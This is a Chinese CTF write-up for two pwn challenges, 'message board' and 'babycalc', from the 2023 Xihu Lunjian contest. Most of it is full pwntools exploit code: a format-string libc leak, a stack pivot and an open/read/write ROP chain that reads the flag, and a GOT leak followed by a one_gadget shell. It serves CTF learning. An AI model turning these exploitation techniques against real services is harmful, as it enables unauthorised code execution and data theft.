2023西湖论剑 部分pwn题WP

水平比较低只能理解两道题


message board

漏洞在这里:
pic1
保护:
pic2
没有canary和pie,libc版本是2.31
pic4
禁了execve,需要使用orw
思路与hgame2023_week1_pwn_orw基本一致(白夜牛逼)栈迁移orw,泄露libc的手法略有不同,这题存在一次格式化字符串漏洞用来泄露libc
对于fmtstr的题目一直不太熟悉,泄露libc尤为手生
通过这题再练一下。调试的时候看到 **__libc_start_main+243** 这个地址，可用于泄露 __libc_start_main；同时 __libc_start_main 作为 libc 的一个符号，可用于计算 libc 基址。接下来控制 %p 参数的偏移就可以回显出该地址，偷懒的话可以直接用 vmmap 对照。
pic3

exp

from pwn import *

# pwntools setup: verbose I/O logging and the terminal gdb.attach() would use.
context.log_level = "debug"
context.terminal = ["konsole", "-e"]

# Local target; the remote line was used against the challenge instance.
p = process("./vuln")
#p = remote("tcp.cloud.dasctf.com", "27285")

elf = ELF("./vuln")
libc = ELF("./libc.so.6")

# Gadgets inside the binary itself (the writeup notes there is no PIE, so
# these addresses are fixed).
# pop rdi ; ret
pop_rdi = 0x0000000000401413
# leave ; ret
leave_ret = 0x00000000004012e1

# Address the first stage returns into, and the .bss region the stack is
# pivoted into.
vuln = 0x401378
bss = 0x404080

puts_got = elf.got["puts"]  # NOTE(review): not used below
puts_plt = elf.plt["puts"]  # NOTE(review): not used below

# Stage 1: format-string leak. "%31$p" prints the 31st stack argument as a
# pointer; the writeup identifies that slot as __libc_start_main+243.
#gdb.attach(p)
p.sendafter(b"name:", b"%31$p")

# Read the 12 hex digits after "0x" and subtract the constant to get the
# libc base (0x24083 is presumably __libc_start_main+243 in this libc 2.31 —
# verify against the libc used by the target).
p.recvuntil(b"0x")
libc_base = int(p.recv(12).decode(), 16) - 0x24083
success("libc_base = " + hex(libc_base))

# Resolve open/read/write and two libc gadgets from the leaked base.
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
# 0x000000000002601f : pop rsi ; ret
pop_rsi = libc_base + 0x000000000002601f
# 0x0000000000142c92 : pop rdx ; ret
pop_rdx = libc_base + 0x0000000000142c92

# Stage 2: overwrite saved rbp with bss+0x200 and the return address with
# vuln, so vuln runs again with its frame in .bss (the stack migration the
# writeup describes). Assumes vuln addresses its buffer relative to rbp —
# confirm in the disassembly.
payload = b"a" * 0xB0
payload += p64(bss + 0x200)
payload += p64(vuln)

p.sendafter(b"DASCTF:", payload)

# Stage 3: the orw chain, written into the relocated buffer. With rbp =
# bss+0x200 = 0x404280 and 0xB0 bytes of frame, the buffer starts at
# 0x4041d0, which is the address passed to open() below. (The original
# annotation said 0x404160; that looks stale.) The first 8 bytes hold the
# NUL-terminated "flag" path and are consumed by the `pop rbp` of leave;ret.
payload = b"flag\x00\x00\x00\x00" # buffer start, 0x4041d0 (see note above)
payload += p64(pop_rdi)
payload += p64(0x4041d0)           # rdi = "flag"
payload += p64(pop_rsi)
payload += p64(0)                  # rsi = 0 (O_RDONLY)
payload += p64(open_addr)          # open("flag", 0)
payload += p64(pop_rdi)
payload += p64(3)                  # rdi = 3 (the fd open() is expected to return)
payload += p64(pop_rsi)
payload += p64(0x404700)           # rsi = scratch buffer in .bss
payload += p64(pop_rdx)
payload += p64(0x100)              # rdx = length
payload += p64(read_addr)          # read(3, 0x404700, 0x100)
payload += p64(pop_rdi)
payload += p64(1)                  # rdi = stdout
payload += p64(pop_rsi)
payload += p64(0x404700)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(write_addr)         # write(1, 0x404700, 0x100)
# Pad to the saved-rbp slot, then point rbp at the chain and return into
# leave;ret so rsp lands on the payload.
payload = payload.ljust(0xB0, b"a")
payload += p64(0x4041d0)
payload += p64(leave_ret)

# gdb.attach(p)
p.send(payload)

p.interactive()

babycalc

exp

from pwn import *
# `logging` is re-exported by `from pwn import *`.
context.log_level = logging.DEBUG

# Remote challenge instance; the local process line is kept for debugging.
# sh = process("./babycalc")
sh = remote("tcp.cloud.dasctf.com", "21539")
libc = ELF("./libc-2.23.so")

# Gadgets in the (non-PIE) binary.
pop_rdi_ret = 0x0000000000400ca3
pop_rsi_r15_ret = 0x0000000000400ca1

# Stage 1: leak. The chain after the 0x20-byte prefix is
# pop rdi; <0x602018>; call <0x4005D0>; return to <0x400C1B>.
# Presumably 0x602018 is puts@got and 0x4005D0 is puts@plt (the leak below is
# parsed as a puts address), and 0x400C1B re-enters the challenge loop —
# confirm against the binary.
payload = b"24"
payload = payload.ljust(0x20, b'\x00')
payload += p64(0xDEADBEEF) + p64(pop_rdi_ret) + p64(0x602018) + p64(0x4005D0) + p64(0x400C1B)
payload = payload.ljust(0x100 - 0x30, b'\x00')
# The 16 bytes at 0x100-0x30 and the trailing p32(0x38) satisfy a check in
# the challenge; their meaning is not derivable from this page.
payload += bytes([19,36,53,70,55,66,17,161,50,131,212,101,118,199,24,3])
payload = payload.ljust(0x100 - 4, b'\x00')
payload += p32(0x38)

print(len(payload))
print(payload)

# gdb.attach(sh)
sh.sendafter(b"number-", payload)

sh.recvuntil(b"good done\n")

# 6 raw bytes of a 64-bit pointer, zero-extended to 8; subtract puts' offset.
libc_base = u64(sh.recv(6).ljust(8, b'\x00')) - libc.sym["puts"]
log.success("libc_base: " + hex(libc_base))

# gdb.attach(sh)

# Stage 2: same layout, but the chain returns to 0x400789 and the bytes after
# the 16-byte block place the libc-2.23 one_gadget (offset 0xf1247, listed in
# the notes at the bottom) behind two zero qwords.
payload = b"24"
payload = payload.ljust(0x20, b'\x00')
payload += p64(0xDEADBEEF) + p64(pop_rdi_ret) + p64(0x602018) + p64(0x4005D0) + p64(0x400789)
payload = payload.ljust(0x100 - 0x30, b'\x00')
payload += bytes([19,36,53,70,55,66,17,161,50,131,212,101,118,199,24,3])
payload += p64(0) * 2 + p64(libc_base + 0xf1247)
payload = payload.ljust(0x100 - 4, b'\x00')
payload += p32(0x38)

sh.sendafter(b"number-", payload)

sh.interactive()

# one_gadget output for libc-2.23 kept from the original notes; 0xf1247 is
# the offset used above.
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""
